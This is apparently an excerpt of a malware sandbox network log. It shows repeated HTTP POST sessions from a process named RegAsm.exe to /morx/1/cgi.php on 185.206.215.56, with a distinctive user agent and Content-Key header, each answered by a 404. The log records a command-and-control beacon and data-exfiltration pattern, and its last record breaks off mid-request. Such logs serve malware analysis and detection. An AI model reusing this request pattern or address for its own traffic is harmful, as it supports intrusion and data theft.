                                                                                        38192.168.2.2249205185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:23.094146967 CET1192OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:23.267446041 CET1192INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:22 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        39192.168.2.2249206185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:23.470458031 CET1193OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:23.640826941 CET1194INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:22 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        4192.168.2.2249171185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:08.887025118 CET1147OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:09.065680027 CET1147INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:08 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        40192.168.2.2249207185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:23.862730026 CET1194OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:24.026554108 CET1195INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:23 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        41192.168.2.2249208185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:24.246260881 CET1196OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:24.440570116 CET1196INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:23 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        42192.168.2.2249209185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:24.648293972 CET1197OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:24.816570997 CET1197INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:23 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        43192.168.2.2249210185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:25.024326086 CET1198OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:25.203072071 CET1199INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:24 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        44192.168.2.2249211185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:25.428992033 CET1199OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:25.591475010 CET1200INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:24 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        45192.168.2.2249212185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:25.813759089 CET1201OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:25.992160082 CET1201INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:25 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        46192.168.2.2249213185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:26.197896004 CET1202OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:26.381041050 CET1203INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:25 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        47192.168.2.2249214185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:26.599441051 CET1203OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:26.766199112 CET1204INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:25 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        48192.168.2.2249215185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:26.971787930 CET1205OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:27.131364107 CET1205INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:26 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        49192.168.2.2249216185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:27.359759092 CET1206OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:27.547158957 CET1207INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:26 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        5192.168.2.2249172185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:09.279376030 CET1148OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:09.462393999 CET1149INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:08 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        50192.168.2.2249217185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:27.753619909 CET1207OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:27.916227102 CET1208INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:27 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        51192.168.2.2249218185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:28.127708912 CET1209OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:28.287151098 CET1209INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:27 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        52192.168.2.2249219185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:28.505440950 CET1210OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:28.661950111 CET1211INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:27 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        53192.168.2.2249220185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:28.880701065 CET1211OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:29.048592091 CET1212INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:28 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        54192.168.2.2249221185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:29.244494915 CET1213OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:29.409620047 CET1213INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:28 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        55192.168.2.2249222185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:29.630363941 CET1214OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:29.797473907 CET1215INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:28 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        56192.168.2.2249223185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:30.014888048 CET1215OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:30.193197012 CET1216INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:29 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        57192.168.2.2249224185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:30.409914970 CET1217OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:30.572042942 CET1217INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:29 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        58192.168.2.2249225185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:30.786520004 CET1218OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:30.947633028 CET1219INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:30 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        59192.168.2.2249226185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:31.159641027 CET1219OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:31.319802046 CET1220INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:30 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        6192.168.2.2249173185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:09.669670105 CET1149OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
